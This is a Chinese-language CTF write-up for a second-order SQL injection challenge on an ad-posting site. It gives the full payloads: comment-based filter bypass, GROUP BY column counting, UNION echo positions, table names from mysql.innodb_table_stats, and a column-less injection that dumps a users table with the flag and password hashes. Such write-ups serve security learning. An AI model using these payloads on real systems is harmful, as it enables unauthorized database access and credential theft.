一、题目分析
网页有登录 注册 广告发布页面,认为是sql注入,每个页面测试后,发现没有注入的地方。字仔细观察后,发现发布过的广告里面,有sql语法报错信息。由此判断存在二次注入。
广告详情
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''11'' limit 0,1' at line 1
广告名 | 广告内容 | 状态 |
---|---|---|
未查找到相关广告信息 |
二、解题
经过测试,过滤有空格和 #, --+, and、or 还有很多常用的关键字。
1 检查数据库列数
1'/**/group/**/by/**/25,'
广告详情
Unknown column '23' in 'group statement'
广告名 | 广告内容 | 状态 |
---|---|---|
未查找到相关广告信息 |
检查到22时发现不报找不到列数了,即该表有22列。、
2 查看回显位置
1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
广告详情
广告名 | 广告内容 | 状态 |
---|---|---|
2 | 3 | 待管理确认 |
回显的位置时2,3号位置。
没有办法使用information_schema,发现还有其他表如mysql.innodb_table_stats和sys.schema_table_statistics_with_buffer可以看表名、数据库名,就是没有列名。
3无列名注入
#获取表名
1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
广告详情
| ||||||||
---|---|---|---|---|---|---|---|---|
#获取各列
user表一般都是id ,name ,password三列
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
广告详情
广告名 | 广告内容 | 状态 |
---|---|---|
2,flag,admin,tt | 3 | 待管理确认 |
#获取数据
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
广告详情
广告名 | 广告内容 | 状态 |
---|---|---|
3,flag{a79305ee-a263-477d-a14d-e7b25c2f3fd7},53e217ad4c721eb9565cf25a5ec3b66e,c4ca4238a0b923820dcc509a6f75849b | 3 | 待管理确认 |